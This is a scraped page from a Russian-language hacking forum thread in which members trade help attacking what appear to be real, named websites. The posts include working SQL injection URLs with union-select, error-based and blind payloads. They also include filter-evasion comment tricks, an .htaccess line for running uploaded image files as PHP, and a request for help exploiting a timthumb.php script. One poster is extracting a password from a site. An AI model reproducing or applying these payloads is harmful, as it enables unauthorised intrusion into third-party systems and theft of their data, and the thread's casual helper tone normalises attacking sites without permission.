Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Попробуй залить .htaccess с содержанием:
    PHP:
    AddHandler application/x-httpd-php .gif
     
    #18521 Ereee, 4 Dec 2011
    Last edited: 4 Dec 2011
  2. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    63
    Reputations:
    34
    Залил AddHandler application/x-httpd-php .php .html _php .png

    smile.html(белая страница) i smile.png(изображение содержит ошибки..) не работают
    При <files "smile.gif">
    AddType application/x-httpd-php .gif
    </files>
    Качает файл
     
  3. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    wkar, бывает, что на некоторых серверах этот способ не могает...
     
    1 person likes this.
  4. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    843
    Likes Received:
    170
    Reputations:
    84
    Code:
    http://onlinewatch24.com/watch/Harry-Potter-and-the-Half-Blood-Prince%27+un/**/ion+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+
    union не нравится ему :rolleyes:
     
    1 person likes this.
  5. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23
    Крути блиндом, по-другому не выйдет
    _http://onlinewatch24.com/search?search=&p=1&f=title+and%20mid(version(),1,1)=5+--+
     
  6. A_n_d_r_e_i

    A_n_d_r_e_i Active Member

    Joined:
    2 Sep 2009
    Messages:
    180
    Likes Received:
    250
    Reputations:
    27
    Your request is blocking firewall on the server
    In the case of a specific vulnerability in firewall, you can spend an injection. More about this http://www.ptsecurity.ru/download/PT-devteev-CC-WAF.pdf
     
  7. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    I need a solution to my problem here.

    Code:
    http://accesssys.net/product_details.php?pid=109%27+and+1=0+union+select+1,2,3,4+--+
    It's showing this.

    The used SELECT statements have a different number of columns

    Any help please?
     
  8. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    952
    Likes Received:
    318
    Reputations:
    52
    lightangel
    http://accesssys.net/solutions.php?sid=-100+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),user(),database()),10--
     
  9. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,055
    Likes Received:
    615
    Reputations:
    690
    2lightangel http://forum.antichat.ru/thread43966.html ты уже ***
     
    _________________________
    5 people like this.
  10. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    Товарищи! Нужна ваша помощь!
    короче вчера вечером тупо лазил по инету и на одной страничке нашел примерно такое:
    подскажите вид уязвимости^^
    а далее сам чего нибудь накручу
    если не получится то конешно отдам вам на растерзание))
     
  11. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    792
    Likes Received:
    349
    Reputations:
    120
    http://forum.antichat.ru/thread12123-including.html
    http://forum.antichat.ru/thread232773.html
    но если ты тупо лазил, то уязвимости там скорее всего нет, просто ошибка подключения файла.
     
  12. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Code:
    http://www.mp3hungama.com/music/genre_albums.php?id=-3+order+by+1,2,3,4+--+
    Shows "Unknown column '4' in 'order clause'

    Code:
    http://www.mp3hungama.com/music/genre_albums.php?id=-3%27+/!*union*/+/!*select*/+1,2,3+--+
    Showing
    406 Not Acceptable
    This request is not acceptable

    Also, another problem.

    Code:
    http://168dragontrading.com/invader-zimms-bitters-action-figure-p-4840.html?cPath=-1+order+by+5 (works)!
    Code:
    http://168dragontrading.com/invader-zimms-bitters-action-figure-p-4840.html?cPath=-1+union+select+1,2,3,4+--+
    Nothing works!
     
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    http://www.mp3hungama.com/music/genre_albums.php?id=3+or+1+group+by+concat(version(),rand(0)|0)+%0A+having+%0A+min(0)--+


    http://168dragontrading.com/invader-zimms-bitters-action-figure-p-4840.html?cPath=1'+or+1+group+by+concat(version(),rand(0)|0)+having+min(0)--+
     
    _________________________
    1 person likes this.
  14. XAOCX

    XAOCX Banned

    Joined:
    19 Dec 2008
    Messages:
    23
    Likes Received:
    4
    Reputations:
    0
    Что с этим можно сделать ?

    Code:
    http://???????.com/wp-content/themes/rttheme9/timthumb.php
     
    #18534 XAOCX, 6 Dec 2011
    Last edited: 6 Dec 2011
  15. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Гуглится легко:
    http://forum.antichat.ru/showpost.php?p=2792868&postcount=170
     
    1 person likes this.
  16. XAOCX

    XAOCX Banned

    Joined:
    19 Dec 2008
    Messages:
    23
    Likes Received:
    4
    Reputations:
    0

    Большое спасибо !
     
  17. XAOCX

    XAOCX Banned

    Joined:
    19 Dec 2008
    Messages:
    23
    Likes Received:
    4
    Reputations:
    0
    Что-то не получается, прошу помощи

    Code:
    http://fusescience.com/wp-content/themes/rttheme9/timthumb.php
     
  18. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    Это не уязвимость
     
    1 person likes this.
  19. XAOCX

    XAOCX Banned

    Joined:
    19 Dec 2008
    Messages:
    23
    Likes Received:
    4
    Reputations:
    0
    А как же это ?


     
  20. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    729
    Likes Received:
    95
    Reputations:
    12
    нашел скулю на сайте и при выводе пароля пишет такую лабуду

    skankjo:�{�o��
    сайт латвийский. Как решить вопрос? как поставить кодировку итальянскую себе в браузер?
    сам запрос
     
    #18540 heks, 6 Dec 2011
    Last edited: 6 Dec 2011
Loading...
Thread Status:
Not open for further replies.